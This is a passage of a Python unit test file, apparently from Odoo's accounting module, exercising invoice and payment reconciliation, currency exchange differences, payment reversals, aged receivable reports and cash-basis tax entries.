move_ids += self.env['account.move'].create(vals)
account_move_line = move_ids.mapped('line_ids').filtered(lambda l: l.account_id == self.account_rcv)
writeoff_vals = [{
'account_id': self.account_rcv.id,
'journal_id': self.bank_journal_euro.id,
'date': time.strftime('%Y') + '-04-15',
'debit': 8.75,
'credit': 0.0
}]
writeoff_line = account_move_line._create_writeoff(writeoff_vals)
(account_move_line + writeoff_line).reconcile()
self.assertEquals(len(writeoff_line), 1, "The writeoff_line (balance_line) should have only one move line")
self.assertTrue(all(l.reconciled for l in writeoff_line), 'The balance lines should be totally reconciled')
self.assertTrue(all(l.reconciled for l in account_move_line), 'The move lines should be totally reconciled')
def test_reconcile_bank_statement_with_payment_and_writeoff(self):
# Use case:
# Company is in EUR, create a bill for 80 USD and register payment of 80 USD.
# create a bank statement in USD bank journal with a bank statement line of 85 USD
# Reconcile bank statement with payment and put the remaining 5 USD in bank fees or another account.
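# Note: the 52.33 and 3.27 EUR figures asserted below assume the stock demo USD rate of roughly
# 1.5289 USD per EUR (80 / 1.5289 = 52.33 and 5 / 1.5289 = 3.27).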
invoice = self.create_invoice(type='out_invoice', invoice_amount=80, currency_id=self.currency_usd_id)
# register payment on invoice
payment = self.env['account.payment'].create({'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 80,
'currency_id': self.currency_usd_id,
'payment_date': time.strftime('%Y') + '-07-15',
'journal_id': self.bank_journal_usd.id,
})
payment.post()
payment_move_line = False
bank_move_line = False
for l in payment.move_line_ids:
if l.account_id.id == self.account_rcv.id:
payment_move_line = l
else:
bank_move_line = l
invoice.register_payment(payment_move_line)
# create bank statement
bank_stmt = self.acc_bank_stmt_model.create({
'journal_id': self.bank_journal_usd.id,
'date': time.strftime('%Y') + '-07-15',
})
bank_stmt_line = self.acc_bank_stmt_line_model.create({'name': 'payment',
'statement_id': bank_stmt.id,
'partner_id': self.partner_agrolait_id,
'amount': 85,
'date': time.strftime('%Y') + '-07-15',})
#reconcile the statement with invoice and put remaining in another account
bank_stmt_line.process_reconciliation(payment_aml_rec= bank_move_line, new_aml_dicts=[{
'account_id': self.diff_income_account.id,
'debit': 0,
'credit': 5,
'name': 'bank fees',
}])
# Check that move lines associated to bank_statement are correct
bank_stmt_aml = self.env['account.move.line'].search([('statement_id', '=', bank_stmt.id)])
bank_stmt_aml |= bank_stmt_aml.mapped('move_id').mapped('line_ids')
self.assertEquals(len(bank_stmt_aml), 4, "The bank statement should have 4 move lines")
lines = {
self.account_usd.id: [
{'debit': 3.27, 'credit': 0.0, 'amount_currency': 5, 'currency_id': self.currency_usd_id},
{'debit': 52.33, 'credit': 0, 'amount_currency': 80, 'currency_id': self.currency_usd_id}
],
self.diff_income_account.id: {'debit': 0.0, 'credit': 3.27, 'amount_currency': -5, 'currency_id': self.currency_usd_id},
self.account_rcv.id: {'debit': 0.0, 'credit': 52.33, 'amount_currency': -80, 'currency_id': self.currency_usd_id},
}
payments = bank_stmt_aml.mapped('payment_id')
# creation and reconciliation of the over-amount statement
# has created another payment
self.assertEqual(len(payments), 2)
# Check amount of second, automatically created payment
self.assertEqual((payments - payment).amount, 5)
for aml in bank_stmt_aml:
line = lines[aml.account_id.id]
if type(line) == list:
# find correct line inside the list
if line[0]['debit'] == round(aml.debit, 2):
line = line[0]
else:
line = line[1]
self.assertEquals(round(aml.debit, 2), line['debit'])
self.assertEquals(round(aml.credit, 2), line['credit'])
self.assertEquals(round(aml.amount_currency, 2), line['amount_currency'])
self.assertEquals(aml.currency_id.id, line['currency_id'])
def test_partial_reconcile_currencies_01(self):
# client Account (payable, rsa)
# Debit Credit
# --------------------------------------------------------
# Pay a : 25/0.5 = 50 | Inv a : 50/0.5 = 100
# Pay b: 50/0.75 = 66.66 | Inv b : 50/0.75 = 66.66
# Pay c: 25/0.8 = 31.25 |
#
# Debit_currency = 100 | Credit currency = 100
# Debit = 147.91 | Credit = 166.66
# Balance Debit = 18.75
# Counterpart Credit goes in Exchange diff
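# Sanity check on the figures above:
#   debits  = 25/0.5 + 50/0.75 + 25/0.8 = 50.00 + 66.66 + 31.25 = 147.91
#   credits = 50/0.5 + 50/0.75 = 100.00 + 66.66 = 166.66
#   166.66 - 147.91 = 18.75, booked as the exchange difference asserted at the end of the test.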
dest_journal_id = self.env['account.journal'].search([('type', '=', 'purchase'), ('company_id', '=', self.env.ref('base.main_company').id)], limit=1)
account_expenses = self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_expenses').id)], limit=1)
self.bank_journal_euro.write({'default_debit_account_id': self.account_rsa.id,
'default_credit_account_id': self.account_rsa.id})
dest_journal_id.write({'default_debit_account_id': self.account_rsa.id,
'default_credit_account_id': self.account_rsa.id})
# Setting up rates for USD (main_company is in EUR)
self.env['res.currency.rate'].create({'name': time.strftime('%Y') + '-' + '07' + '-01',
'rate': 0.5,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id})
self.env['res.currency.rate'].create({'name': time.strftime('%Y') + '-' + '08' + '-01',
'rate': 0.75,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id})
self.env['res.currency.rate'].create({'name': time.strftime('%Y') + '-' + '09' + '-01',
'rate': 0.80,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id})
# Preparing Invoices (from vendor)
invoice_a = self.account_invoice_model.create({'partner_id': self.partner_agrolait_id,
'currency_id': self.currency_usd_id,
'name': 'invoice to vendor',
'account_id': self.account_rsa.id,
'type': 'in_invoice',
'date_invoice': time.strftime('%Y') + '-' + '07' + '-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': 50,
'invoice_id': invoice_a.id,
'name': 'product that cost ' + str(50),
'account_id': account_expenses.id,
})
invoice_b = self.account_invoice_model.create({'partner_id': self.partner_agrolait_id,
'currency_id': self.currency_usd_id,
'name': 'invoice to vendor',
'account_id': self.account_rsa.id,
'type': 'in_invoice',
'date_invoice': time.strftime('%Y') + '-' + '08' + '-01',
})
self.account_invoice_line_model.create({'product_id': self.product.id,
'quantity': 1,
'price_unit': 50,
'invoice_id': invoice_b.id,
'name': 'product that cost ' + str(50),
'account_id': account_expenses.id,
})
invoice_a.action_invoice_open()
invoice_b.action_invoice_open()
# Preparing Payments
# One partial for invoice_a (fully assigned to it)
payment_a = self.env['account.payment'].create({'payment_type': 'outbound',
'amount': 25,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_euro.id,
'company_id': self.env.ref('base.main_company').id,
'payment_date': time.strftime('%Y') + '-' + '07' + '-01',
'partner_id': self.partner_agrolait_id,
'payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,
'destination_journal_id': dest_journal_id.id,
'partner_type': 'supplier'})
# One that will complete the payment of a, the rest goes to b
payment_b = self.env['account.payment'].create({'payment_type': 'outbound',
'amount': 50,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_euro.id,
'company_id': self.env.ref('base.main_company').id,
'payment_date': time.strftime('%Y') + '-' + '08' + '-01',
'partner_id': self.partner_agrolait_id,
'payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,
'destination_journal_id': dest_journal_id.id,
'partner_type': 'supplier'})
# The last one will complete the payment of b
payment_c = self.env['account.payment'].create({'payment_type': 'outbound',
'amount': 25,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_euro.id,
'company_id': self.env.ref('base.main_company').id,
'payment_date': time.strftime('%Y') + '-' + '09' + '-01',
'partner_id': self.partner_agrolait_id,
'payment_method_id': self.env.ref('account.account_payment_method_manual_out').id,
'destination_journal_id': dest_journal_id.id,
'partner_type': 'supplier'})
payment_a.post()
payment_b.post()
payment_c.post()
# Assigning payments to invoices
debit_line_a = payment_a.move_line_ids.filtered(lambda l: l.debit and l.account_id == dest_journal_id.default_debit_account_id)
debit_line_b = payment_b.move_line_ids.filtered(lambda l: l.debit and l.account_id == dest_journal_id.default_debit_account_id)
debit_line_c = payment_c.move_line_ids.filtered(lambda l: l.debit and l.account_id == dest_journal_id.default_debit_account_id)
invoice_a.assign_outstanding_credit(debit_line_a.id)
invoice_a.assign_outstanding_credit(debit_line_b.id)
invoice_b.assign_outstanding_credit(debit_line_b.id)
invoice_b.assign_outstanding_credit(debit_line_c.id)
# Asserting correctness (only in the payable account)
full_reconcile = False
for inv in (invoice_a + invoice_b):
self.assertTrue(inv.reconciled)
for aml in (inv.payment_move_line_ids + inv.move_id.line_ids).filtered(lambda l: l.account_id == self.account_rsa):
self.assertEqual(aml.amount_residual, 0.0)
self.assertEqual(aml.amount_residual_currency, 0.0)
self.assertTrue(aml.reconciled)
if not full_reconcile:
full_reconcile = aml.full_reconcile_id
else:
self.assertTrue(aml.full_reconcile_id == full_reconcile)
full_rec_move = full_reconcile.exchange_move_id
# Globally check whether the amount is correct
self.assertEqual(full_rec_move.amount, 18.75)
# Checking if the direction of the move is correct
full_rec_payable = full_rec_move.line_ids.filtered(lambda l: l.account_id == self.account_rsa)
self.assertEqual(full_rec_payable.balance, 18.75)
def test_unreconcile(self):
# Use case:
# 2 invoices paid with a single payment. Unreconcile the payment with one invoice, the
# other invoice should remain reconciled.
inv1 = self.create_invoice(invoice_amount=10, currency_id=self.currency_usd_id)
inv2 = self.create_invoice(invoice_amount=20, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 100,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
})
payment.post()
credit_aml = payment.move_line_ids.filtered('credit')
# Check residual before assignation
self.assertAlmostEquals(inv1.residual, 10)
self.assertAlmostEquals(inv2.residual, 20)
# Assign credit and residual
inv1.assign_outstanding_credit(credit_aml.id)
inv2.assign_outstanding_credit(credit_aml.id)
self.assertAlmostEquals(inv1.residual, 0)
self.assertAlmostEquals(inv2.residual, 0)
# Unreconcile one invoice at a time and check residual
credit_aml.with_context(invoice_id=inv1.id).remove_move_reconcile()
self.assertAlmostEquals(inv1.residual, 10)
self.assertAlmostEquals(inv2.residual, 0)
credit_aml.with_context(invoice_id=inv2.id).remove_move_reconcile()
self.assertAlmostEquals(inv1.residual, 10)
self.assertAlmostEquals(inv2.residual, 20)
def test_unreconcile_exchange(self):
# Use case:
# - Company currency in EUR
# - Create 2 rates for USD:
# 1.0 on 2018-01-01
# 0.5 on 2018-02-01
# - Create an invoice on 2018-01-02 of 111 USD
# - Register a payment on 2018-02-02 of 111 USD
# - Unreconcile the payment
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-08-01',
'rate': 0.5,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv = self.create_invoice(invoice_amount=111, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 111,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
'payment_date': time.strftime('%Y') + '-08-01',
})
payment.post()
credit_aml = payment.move_line_ids.filtered('credit')
# Check residual before assignation
self.assertAlmostEquals(inv.residual, 111)
# Assign credit, check exchange move and residual
inv.assign_outstanding_credit(credit_aml.id)
self.assertEqual(len(payment.move_line_ids.mapped('full_reconcile_id').exchange_move_id), 1)
self.assertAlmostEquals(inv.residual, 0)
# Unreconcile invoice and check residual
credit_aml.with_context(invoice_id=inv.id).remove_move_reconcile()
self.assertAlmostEquals(inv.residual, 111)
def test_revert_payment_and_reconcile(self):
payment = self.env['account.payment'].create({
'payment_method_id': self.inbound_payment_method.id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'journal_id': self.bank_journal_usd.id,
'payment_date': '2018-06-04',
'amount': 666,
})
payment.post()
self.assertEqual(len(payment.move_line_ids), 2)
bank_line = payment.move_line_ids.filtered(lambda l: l.account_id.id == self.bank_journal_usd.default_debit_account_id.id)
customer_line = payment.move_line_ids - bank_line
self.assertEqual(len(bank_line), 1)
self.assertEqual(len(customer_line), 1)
self.assertNotEqual(bank_line.id, customer_line.id)
self.assertEqual(bank_line.move_id.id, customer_line.move_id.id)
move = bank_line.move_id
# Reversing the payment's move
reversed_move_list = move.reverse_moves('2018-06-04')
self.assertEqual(len(reversed_move_list), 1)
reversed_move = self.env['account.move'].browse(reversed_move_list[0])
self.assertEqual(len(reversed_move.line_ids), 2)
# Testing the reconciliation matching between the move lines and their reversed counterparts
reversed_bank_line = reversed_move.line_ids.filtered(lambda l: l.account_id.id == self.bank_journal_usd.default_debit_account_id.id)
reversed_customer_line = reversed_move.line_ids - reversed_bank_line
self.assertEqual(len(reversed_bank_line), 1)
self.assertEqual(len(reversed_customer_line), 1)
self.assertNotEqual(reversed_bank_line.id, reversed_customer_line.id)
self.assertEqual(reversed_bank_line.move_id.id, reversed_customer_line.move_id.id)
self.assertEqual(reversed_bank_line.full_reconcile_id.id, bank_line.full_reconcile_id.id)
self.assertEqual(reversed_customer_line.full_reconcile_id.id, customer_line.full_reconcile_id.id)
def test_aged_report(self):
AgedReport = self.env['report.account.report_agedpartnerbalance'].with_context(include_nullified_amount=True)
account_type = ['receivable']
report_date_to = time.strftime('%Y') + '-07-17'
partner = self.env['res.partner'].create({'name': 'AgedPartner'})
currency = self.env.user.company_id.currency_id
invoice = self.create_invoice_partner(currency_id=currency.id, partner_id=partner.id)
journal = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'THE'})
statement = self.make_payment(invoice, journal, 50)
# The report searches on the create_date to dispatch reconciled lines to report periods
# Also, in this case, there can be only 1 partial_reconcile
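# The raw SQL below is a test-only shortcut to backdate create_date, which is a system column
# not meant to be written through the ORM.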
statement_partial_id = statement.move_line_ids.mapped(lambda l: l.matched_credit_ids + l.matched_debit_ids)
self.env.cr.execute('UPDATE account_partial_reconcile SET create_date = %(date)s WHERE id = %(partial_id)s',
{'date': report_date_to + ' 00:00:00',
'partial_id': statement_partial_id.id})
# Case 1: The invoice and payment are reconciled: Nothing should appear
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [], 'The aged receivable shouldn\'t have lines at this point')
self.assertFalse(amls.get(partner.id, False), 'The aged receivable should not have amls either')
# Case 2: The invoice and payment are not reconciled: we should have one line on the report
# and 2 amls
invoice.move_id.line_ids.with_context(invoice_id=invoice.id).remove_move_reconcile()
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [{'trust': 'normal', '1': 0.0, '0': 0.0, 'direction': 0.0, 'partner_id': partner.id, '3': 0.0, 'total': 0.0, 'name': 'AgedPartner', '4': 0.0, '2': 0.0}],
'We should have a line in the report for the partner')
self.assertEqual(len(amls[partner.id]), 2, 'We should have 2 account move lines for the partner')
positive_line = [line for line in amls[partner.id] if line['line'].balance > 0]
negative_line = [line for line in amls[partner.id] if line['line'].balance < 0]
self.assertEqual(positive_line[0]['amount'], 50.0, 'The amount of the amls should be 50')
self.assertEqual(negative_line[0]['amount'], -50.0, 'The amount of the amls should be -50')
def test_revert_payment_and_reconcile_exchange(self):
# A reversal of a reconciled payment which created a currency exchange entry, should create reversal moves
# which move lines should be reconciled two by two with the original move's lines
def _determine_debit_credit_line(move):
line_ids_reconciliable = move.line_ids.filtered(lambda l: l.account_id.reconcile or l.account_id.internal_type == 'liquidity')
return line_ids_reconciliable.filtered(lambda l: l.debit), line_ids_reconciliable.filtered(lambda l: l.credit)
def _move_revert_test_pair(move, revert):
self.assertTrue(move.line_ids)
self.assertTrue(revert.line_ids)
move_lines = _determine_debit_credit_line(move)
revert_lines = _determine_debit_credit_line(revert)
# in the case of the exchange entry, only one pair of lines will be found
if move_lines[0] and revert_lines[1]:
self.assertTrue(move_lines[0].full_reconcile_id.exists())
self.assertEqual(move_lines[0].full_reconcile_id.id, revert_lines[1].full_reconcile_id.id)
if move_lines[1] and revert_lines[0]:
self.assertTrue(move_lines[1].full_reconcile_id.exists())
self.assertEqual(move_lines[1].full_reconcile_id.id, revert_lines[0].full_reconcile_id.id)
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-08-01',
'rate': 0.5,
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv = self.create_invoice(invoice_amount=111, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 111,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
'payment_date': time.strftime('%Y') + '-08-01',
})
payment.post()
credit_aml = payment.move_line_ids.filtered('credit')
inv.assign_outstanding_credit(credit_aml.id)
self.assertTrue(inv.state == 'paid', 'The invoice should be paid')
exchange_reconcile = payment.move_line_ids.mapped('full_reconcile_id')
exchange_move = exchange_reconcile.exchange_move_id
payment_move = payment.move_line_ids[0].move_id
reverted_payment_move = self.env['account.move'].browse(payment_move.reverse_moves(time.strftime('%Y') + '-08-01'))
# After reversal of payment, the invoice should be open
self.assertTrue(inv.state == 'open', 'The invoice should be open again')
self.assertFalse(exchange_reconcile.exists())
reverted_exchange_move = self.env['account.move'].search([('journal_id', '=', exchange_move.journal_id.id), ('ref', 'ilike', exchange_move.name)], limit=1)
_move_revert_test_pair(payment_move, reverted_payment_move)
_move_revert_test_pair(exchange_move, reverted_exchange_move)
def test_aged_report_future_payment(self):
AgedReport = self.env['report.account.report_agedpartnerbalance'].with_context(include_nullified_amount=True)
account_type = ['receivable']
partner = self.env['res.partner'].create({'name': 'AgedPartner'})
currency = self.env.user.company_id.currency_id
invoice = self.create_invoice_partner(currency_id=currency.id, partner_id=partner.id)
journal = self.env['account.journal'].create({'name': 'Bank', 'type': 'bank', 'code': 'THE'})
statement = self.make_payment(invoice, journal, 50)
# Force the payment recording to take place on the invoice date
# Although the payment due_date is in the future relative to the invoice
# Also, in this case, there can be only 1 partial_reconcile
statement_partial_id = statement.move_line_ids.mapped(lambda l: l.matched_credit_ids + l.matched_debit_ids)
self.env.cr.execute('UPDATE account_partial_reconcile SET create_date = %(date)s WHERE id = %(partial_id)s',
{'date': invoice.date_invoice,
'partial_id': statement_partial_id.id})
# Case 1: report date is invoice date
# There should be an entry for the partner
report_date_to = invoice.date_invoice
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [{
'name': 'AgedPartner',
'trust': 'normal',
'partner_id': partner.id,
'0': 0.0,
'1': 0.0,
'2': 0.0,
'3': 0.0,
'4': 0.0,
'total': 50.0,
'direction': 50.0,
}], 'We should have a line in the report for the partner')
self.assertEqual(len(amls[partner.id]), 1, 'We should have 1 account move lines for the partner')
positive_line = [line for line in amls[partner.id] if line['line'].balance > 0]
self.assertEqual(positive_line[0]['amount'], 50.0, 'The amount of the amls should be 50')
# Case 2: report date between invoice date and payment date
# There should be an entry for the partner
# And the amount has shifted to '1-30 due'
report_date_to = time.strftime('%Y') + '-07-08'
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [{
'name': 'AgedPartner',
'trust': 'normal',
'partner_id': partner.id,
'0': 0.0,
'1': 0.0,
'2': 0.0,
'3': 0.0,
'4': 50.0,
'total': 50.0,
'direction': 0.0,
}], 'We should have a line in the report for the partner')
self.assertEqual(len(amls[partner.id]), 1, 'We should have 1 account move lines for the partner')
positive_line = [line for line in amls[partner.id] if line['line'].balance > 0]
self.assertEqual(positive_line[0]['amount'], 50.0, 'The amount of the amls should be 50')
# Case 3: report date on payment date
# There should not be an entry for the partner
report_date_to = time.strftime('%Y') + '-07-15'
report_lines, total, amls = AgedReport._get_partner_move_lines(account_type, report_date_to, 'posted', 30)
partner_lines = [line for line in report_lines if line['partner_id'] == partner.id]
self.assertEqual(partner_lines, [], 'The aged receivable shouldn\'t have lines at this point')
self.assertFalse(amls.get(partner.id, False), 'The aged receivable should not have amls either')
def test_partial_reconcile_currencies_02(self):
####
# Day 1: Invoice Cust/001 to customer (expressed in USD)
# Market value of USD (day 1): 1 USD = 0.5 EUR
# * Dr. 100 USD / 50 EUR - Accounts receivable
# * Cr. 100 USD / 50 EUR - Revenue
####
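# Note: res.currency.rate stores the amount of foreign currency per unit of company currency,
# so the USD rate of 2 created below (company currency EUR) means 1 USD = 0.5 EUR, hence 100 USD -> 50 EUR.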
account_revenue = self.env['account.account'].search(
[('user_type_id', '=', self.env.ref(
'account.data_account_type_revenue').id)], limit=1)
dest_journal_id = self.env['account.journal'].search(
[('type', '=', 'purchase'),
('company_id', '=', self.env.ref('base.main_company').id)],
limit=1)
# Delete any old rate - to make sure that we use the ones we need.
old_rates = self.env['res.currency.rate'].search(
[('currency_id', '=', self.currency_usd_id)])
old_rates.unlink()
self.env['res.currency.rate'].create({
'currency_id': self.currency_usd_id,
'name': time.strftime('%Y') + '-01-01',
'rate': 2,
})
invoice_cust_1 = self.account_invoice_model.create({
'partner_id': self.partner_agrolait_id,
'account_id': self.account_rcv.id,
'type': 'out_invoice',
'currency_id': self.currency_usd_id,
'date_invoice': time.strftime('%Y') + '-01-01',
})
self.account_invoice_line_model.create({
'quantity': 1.0,
'price_unit': 100.0,
'invoice_id': invoice_cust_1.id,
'name': 'product that cost 100',
'account_id': account_revenue.id,
})
invoice_cust_1.action_invoice_open()
self.assertEqual(invoice_cust_1.residual_company_signed, 50.0)
aml = invoice_cust_1.move_id.mapped('line_ids').filtered(
lambda x: x.account_id == account_revenue)
self.assertEqual(aml.credit, 50.0)
#####
# Day 2: Receive payment for half invoice Cust/1 (in USD)
# -------------------------------------------------------
# Market value of USD (day 2): 1 USD = 1 EUR
# Payment transaction:
# * Dr. 50 USD / 50 EUR - EUR Bank (valued at market price
# at the time of receiving the money)
# * Cr. 50 USD / 50 EUR - Accounts Receivable
#####
self.env['res.currency.rate'].create({
'currency_id': self.currency_usd_id,
'name': time.strftime('%Y') + '-01-02',
'rate': 1,
})
# register payment on invoice
payment = self.env['account.payment'].create(
{'payment_type': 'inbound',
'payment_method_id': self.env.ref(
'account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 50,
'currency_id': self.currency_usd_id,
'payment_date': time.strftime('%Y') + '-01-02',
'journal_id': dest_journal_id.id,
})
payment.post()
payment_move_line = False
for l in payment.move_line_ids:
if l.account_id == invoice_cust_1.account_id:
payment_move_line = l
invoice_cust_1.register_payment(payment_move_line)
# We expect at this point that the invoice should still be open,
# because they still owe us 50 in company currency.
self.assertEqual(invoice_cust_1.state, 'open',
'Invoice is in status %s' % invoice_cust_1.state)
def test_inv_refund_foreign_payment_writeoff_domestic(self):
company = self.env.ref('base.main_company')
self.env['res.currency.rate'].search([]).unlink()
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.0,
'currency_id': self.currency_euro_id,
'company_id': company.id
})
self.env['res.currency.rate'].create({
'name': time.strftime('%Y') + '-07-01',
'rate': 1.113900, # Don't change this !
'currency_id': self.currency_usd_id,
'company_id': self.env.ref('base.main_company').id
})
inv1 = self.create_invoice(invoice_amount=480, currency_id=self.currency_usd_id)
inv2 = self.create_invoice(type="out_refund", invoice_amount=140, currency_id=self.currency_usd_id)
payment = self.env['account.payment'].create({
'payment_method_id': self.inbound_payment_method.id,
'payment_type': 'inbound',
'partner_type': 'customer',
'partner_id': inv1.partner_id.id,
'amount': 287.20,
'journal_id': self.bank_journal_euro.id,
'company_id': company.id,
})
payment.post()
inv1_receivable = inv1.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
inv2_receivable = inv2.move_id.line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
pay_receivable = payment.move_line_ids.filtered(lambda l: l.account_id.internal_type == 'receivable')
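# Sanity of the write-off amount: 480 USD / 1.1139 = 430.92 EUR and 140 USD / 1.1139 = 125.68 EUR, leaving a net receivable of 305.24 EUR; the 287.20 EUR payment plus the 18.04 EUR write-off below fully reconciles it.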
data_for_reconciliation = [
{
'type': 'partner',
'id': inv1.partner_id.id,
'mv_line_ids': (inv1_receivable + inv2_receivable + pay_receivable).ids,
'new_mv_line_dicts': [
{
'credit': 18.04,
'debit': 0.00,
'journal_id': self.bank_journal_euro.id,
'name': 'Total WriteOff (Fees)',
'account_id': self.diff_expense_account.id
}
]
}
]
self.env["account.reconciliation.widget"].process_move_lines(data_for_reconciliation)
self.assertTrue(inv1_receivable.full_reconcile_id.exists())
self.assertEquals(inv1_receivable.full_reconcile_id, inv2_receivable.full_reconcile_id)
self.assertEquals(inv1_receivable.full_reconcile_id, pay_receivable.full_reconcile_id)
self.assertTrue(inv1.reconciled)
self.assertTrue(inv2.reconciled)
self.assertEquals(inv1.state, 'paid')
self.assertEquals(inv2.state, 'paid')
def test_multiple_term_reconciliation_opw_1906665(self):
'''Test that when registering a payment to an invoice with multiple
payment term lines the reconciliation happens against the line
with the earliest date_maturity
'''
payment_term = self.env['account.payment.term'].create({
'name': 'Pay in 2 installments',
'line_ids': [
# Pay 50% immediately
(0, 0, {
'value': 'percent',
'value_amount': 50,
}),
# Pay the rest after 14 days
(0, 0, {
'value': 'balance',
'days': 14,
})
],
})
# can't use self.create_invoice because it validates and we need to set payment_term_id
invoice = self.account_invoice_model.create({
'partner_id': self.partner_agrolait_id,
'payment_term_id': payment_term.id,
'currency_id': self.currency_usd_id,
'name': 'Multiple payment terms',
'account_id': self.account_rcv.id,
'type': 'out_invoice',
'date_invoice': time.strftime('%Y') + '-07-01',
})
self.account_invoice_line_model.create({
'product_id': self.product.id,
'quantity': 1,
'price_unit': 50,
'invoice_id': invoice.id,
'name': self.product.display_name,
'account_id': self.env['account.account'].search([('user_type_id', '=', self.env.ref('account.data_account_type_revenue').id)], limit=1).id,
})
invoice.action_invoice_open()
payment = self.env['account.payment'].create({
'payment_type': 'inbound',
'payment_method_id': self.env.ref('account.account_payment_method_manual_in').id,
'partner_type': 'customer',
'partner_id': self.partner_agrolait_id,
'amount': 25,
'currency_id': self.currency_usd_id,
'journal_id': self.bank_journal_usd.id,
})
payment.post()
invoice.assign_outstanding_credit(payment.move_line_ids.filtered('credit').id)
receivable_lines = invoice.move_id.line_ids.filtered(lambda line: line.account_id == self.account_rcv).sorted('date_maturity')[0]
self.assertTrue(receivable_lines.matched_credit_ids)
def test_reconciliation_cash_basis01(self):
# Simulates an expense made up of 2 lines:
# one is subject to a cash basis tax,
# the other is not subject to tax
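# With a cash basis tax, the tax only becomes due upon payment: reconciling the payable lines triggers entries in the tax cash basis journal that move the tax from the waiting account to the final tax account, prorated by the amount paid.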
company = self.env.ref('base.main_company')
company.tax_cash_basis_journal_id = self.cash_basis_journal
AccountMoveLine = self.env['account.move.line'].with_context(check_move_validity=False)
# Purchase
purchase_move = self.env['account.move'].create({
'name': 'purchase',
'journal_id': self.purchase_journal.id,
})
purchase_payable_line0 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 100,
'move_id': purchase_move.id,
})
purchase_payable_line1 = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'credit': 50,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expensNoTax',
'account_id': self.expense_account.id,
'debit': 50,
'move_id': purchase_move.id,
})
AccountMoveLine.create({
'name': 'expenseTaxed',
'account_id': self.expense_account.id,
'debit': 83.33,
'move_id': purchase_move.id,
'tax_ids': [(4, self.tax_cash_basis.id, False)],
})
tax_line = AccountMoveLine.create({
'name': 'TaxLine',
'account_id': self.tax_waiting_account.id,
'debit': 16.67,
'move_id': purchase_move.id,
'tax_line_id': self.tax_cash_basis.id,
})
purchase_move.post()
# Payment Move
payment_move = self.env['account.move'].create({
'name': 'payment',
'journal_id': self.bank_journal_euro.id,
})
payment_payable_line = AccountMoveLine.create({
'account_id': self.account_rsa.id,
'debit': 150,
'move_id': payment_move.id,
})
AccountMoveLine.create({
'account_id': self.account_euro.id,
'credit': 150,
'move_id': payment_move.id,
})
payment_move.post()
to_reconcile = (purchase_move + payment_move).mapped('line_ids').filtered(lambda l: l.account_id.internal_type == 'payable')
to_reconcile.reconcile()
cash_basis_moves = self.env['account.move'].search([('journal_id', '=', self.cash_basis_journal.id)])
self.assertEqual(len(cash_basis_moves), 2)
self.assertTrue(cash_basis_moves.exists())
# check reconciliation in Payable account
self.assertTrue(purchase_payable_line0.full_reconcile_id.exists())
self.assertEqual(purchase_payable_line0.full_reconcile_id.reconciled_line_ids,
purchase_payable_line0 + purchase_payable_line1 + payment_payable_line)
cash_basis_aml_ids = cash_basis_moves.mapped('line_ids')
# check reconciliation in the tax waiting account
self.assertTrue(tax_line.full_reconcile_id.exists())
self.assertEqual(tax_line.full_reconcile_id.reconciled_line_ids,
cash_basis_aml_ids.filtered(lambda l: l.account_id == self.tax_waiting_account) + tax_line)
